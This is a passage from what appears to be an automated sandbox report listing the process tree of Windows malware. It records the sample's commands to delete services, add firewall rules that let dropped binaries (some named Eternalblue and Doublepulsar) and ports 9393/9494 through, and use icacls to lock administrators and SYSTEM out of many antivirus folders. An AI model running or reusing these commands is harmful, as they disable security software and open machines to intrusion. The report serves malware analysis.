- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:16364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:16592
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:9076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:12320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:11696
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:8692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:11728
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:16756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:9532
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:7744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:5292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:14200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:16180
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:8544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:4196
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:6860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:9792
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:14652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:8576
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:19616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:8280
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:14340
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:6848
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:7840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:13732
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:19492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:10768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:8536
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:5228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:13736
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:9424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
  2⤵
  PID:15556
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:9268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
  2⤵
  PID:15300
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:15928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:17800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
  2⤵
  PID:17152
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:10616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
  2⤵
  PID:15092
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:17864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
  2⤵
  PID:14648
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:17820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
  2⤵
  PID:13664
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:17476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
  2⤵
  PID:6956
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - Modifies Windows Firewall
    PID:7452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:14904
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:8976
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:10260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:16764
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:15316
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
  2⤵
  PID:14288
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:12812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:13388
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7652
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:7792
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:7204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
  2⤵
  PID:16364
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15136
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:6980
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:17356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:7896
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:9796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:12104
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:15768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:14972
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    - Modifies file permissions
    PID:8508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:10756
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:12720
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
  2⤵
  PID:11324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12724
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19420
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16664
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:8864
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:384
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:19992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:17424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:13308
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:7528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:9772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:11868
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:20188
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:15788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:10772
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:19232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6936
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:20292
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:19240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:8700
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:5452
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:13120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15032
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:8460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:9548
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:11336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:20404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:16416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:16496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12188
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:9328
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:9528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:13824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:18316
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:12248
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:17184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:11756
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:6820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:9360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:14216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:14576
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:12096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:15172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:10012
- C:\Windows\SysWOW64\cmd.exe
